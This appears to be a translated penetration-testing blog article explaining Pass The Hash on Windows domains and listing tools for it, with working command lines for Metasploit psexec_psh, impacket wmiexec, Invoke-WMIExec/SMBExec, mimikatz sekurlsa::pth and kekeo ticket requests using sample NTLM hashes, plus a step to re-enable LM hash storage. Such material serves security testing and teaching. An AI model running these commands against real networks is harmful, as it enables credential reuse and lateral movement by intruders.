0x00 Preface

---

In a previous article 'Domain Penetration - Pass The Hash & Pass The Key', the impact of kb2871997 on Pass The Hash was introduced. This article will approach from another perspective, introducing the relevant implementations of Pass The Hash

0x01 Introduction

---

This article will cover the following topics:

  • Principles of Pass The Hash
  • Common Tools
  • Pass The Hash in mimikatz
  • Pass The Ticket in mimikatz

0x02 Principles of Pass The Hash

---

Refer to the introduction on Wikipedia, available at:

https://en.wikipedia.org/wiki/Pass_the_hash

Extract key information:

  • In Windows systems, NTLM authentication is typically used.
  • NTLM authentication does not use plaintext passwords but instead uses hash values generated from encrypted passwords, created by system APIs (e.g., LsaLogonUser).
  • Hashes are divided into LM hash and NT hash. If the password length exceeds 15 characters, LM hash cannot be generated. Starting from Windows Vista and Windows Server 2008, Microsoft disabled LM hash by default.
  • If an attacker obtains the hash, they can impersonate the user during authentication (i.e., bypass the process of calling the API to generate the hash).

Note:

mimikatz supports extracting LM hash from memory, but only if the Windows system supports LM hash.

Method to enable LM hash on Windows Server 2008:

gpedit.msc → Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options

Find 'Network security: Do not store LAN Manager hash value on next password change' and select 'Disabled'.

After the system changes the password next time, LM hash can be extracted.

0x03 Common Tools

---

When we obtain a user's password hash and are limited to not cracking the plaintext password, what tools can be used for Pass The Hash?

1. Tools in Kali

(1) meterpreter

use exploit/windows/smb/psexec_psh

(2) Toolkit

Located under Password Attacks - Passing the Hash, as shown in the figure below

Alt text

Includes various exploitation tools

2、Tools for Windows systems

(1) python

wmiexec:

Reference address:

https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py

EXE version download address:

https://github.com/maaaaz/impacket-examples-windows

Note:

The comment in wmiexec.py indicates "Main advantage here is it runs under the user (has to be Admin) account", but actual testing shows that regular user permissions are sufficient

Parameter example:

wmiexec -hashes 00000000000000000000000000000000:7ECFFFF0C3548187607A14BAD0F88BB1 TEST/[email protected] "whoami"

The hash parameter format for wmiexec.py is LMHASH:NTHASH. Since this hash comes from Server 2008, which does not support LM hash by default, the LM hash can be set to any value.

(2) powershell

Reference URL:

https://github.com/Kevin-Robertson/Invoke-TheHash/

Supports multiple methods

Invoke-WMIExec:

Parameter example:

Invoke-WMIExec -Target 192.168.1.1 -Domain test.local -Username test1 -Hash 7ECFFFF0C3548187607A14BAD0F88BB1 -Command "calc.exe" -verbose

Similar to wmiexec.py

Invoke-SMBExec:

Supports SMB1, SMB2 (2.1), and SMB signing

Parameter example:

Invoke-SMBExec -Target 192.168.0.2 -Domain test.local -Username test1 -Hash 7ECFFFF0C3548187607A14BAD0F88BB1 -Command "calc.exe" -verbose

By creating a service on the target host to execute commands, thus the privilege is system

Invoke-SMBClient:

Supports SMB1, SMB2 (2.1), and SMB signing

If only having permissions for SMB file sharing but no remote execution permissions, this script can be used

Supported functions include listing directories, uploading files, downloading files, deleting files (specific permissions depend on the permissions of the password hash)

(3) mimikatz

Pass-The-Hash:

Actually Overpass-the-hash

Parameter example:

privilege::debug
sekurlsa::pth /user:test1 /domain:test.local /ntlm:c5a237b7e9d8e708d8436b6148a25fa1

Note:

The pth function of mimikatz requires local administrator privileges, which is determined by its implementation mechanism, as it needs to first obtain information from the high-privilege process lsass.exe

For 8.1/2012r2, Win 7/2008r2/8/2012 with patch kb2871997 installed, AES keys can be used instead of NT hash

Pass-The-Ticket:

Considering that mimikatz's Pass-The-Hash feature requires local administrator privileges, mimikatz also provides a solution that does not require administrator privileges: Pass-The-Ticket.

Pass-The-Ticket requires the use of another open-source tool by gentilkiwi called kekeo, download address:

https://github.com/gentilkiwi/kekeo

Parameter example:

kekeo "tgt::ask /user:test1 /domain:test.local /ntlm:7ECFFFF0C3548187607A14BAD0F88BB1"

After execution, the ticket [email protected][email protected] is generated.

Next, import the ticket:

kekeo "kerberos::ptt [email protected][email protected]"

0x04 Summary

---

This article lists various tools for implementing Pass The Hash; contributions are welcome.